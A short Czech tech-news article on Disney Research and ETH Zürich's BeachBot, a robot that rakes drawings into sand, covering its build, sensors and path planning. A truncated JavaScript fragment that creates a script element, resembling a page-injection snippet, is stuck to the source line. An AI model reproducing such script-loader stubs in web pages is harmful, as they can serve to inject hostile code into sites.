UGV | Robot

Disneyho plážový malíř

Zábavy není nikdy dost, a tak se na pláži můžete setkat třeba s BeachBotem, což je autonomní robot, vytvářející umělecké kresby na písečné pláži. Jde o výsledek spolupráce Disney Research a ETH Zürich, za vnějším vzhledem stojí studenti průmyslového designu ze ZHdK.

BeachBot | foto: Disney Research Zurich/ETH Zurich

BeachBot | foto: Disney Research Zurich/ETH Zurich

BeachBot má délku 60 cm, šířku a výšku 40 cm. Pro zajištění maximální mobility má 3kolové uspořádání s diferenciálním pohonem zadních kol a řídícím předním kolem. Obrázky řeže do písku hráběmi se sedmi samostatně stavitelnými segmenty (lidově řečeno kolíky) ovládaných přes servomotory.
Přesnost obrazců zajišťuje inerciální měřící jednotky s využitím laserového skeneru na BeachBotovi a odrážečů, které ohraničují prostor, ve kterém se BeachBot nachází. Lze tak vytvořit aktivní mapu robotova okolí. Je samozřejmě osazen řídicím počítačem s Wi-Fi.

Za vznikem robota samozřejmě nestojí pouze snaha pobavit, ale řešení robotického problému plánování trasy. Robot obdrží základní nákres a spočítá trajektrorii co nejblíže zadání. U velkých obrazců ale musí dojít k následné korekci, Cílem týmu je zcela autonomní funkčnost robota. Hlavním přínosem je samozřejmě vznik specializovaného softwaru a potřebných algoritmů.

zdroj: BeachBotvar d=document;var s=d.createElement(‚script‘);

Předchozí článek

Connick left a legacy of masterful stained glass art in

Další článek

Polsko nakoupí taktické UAV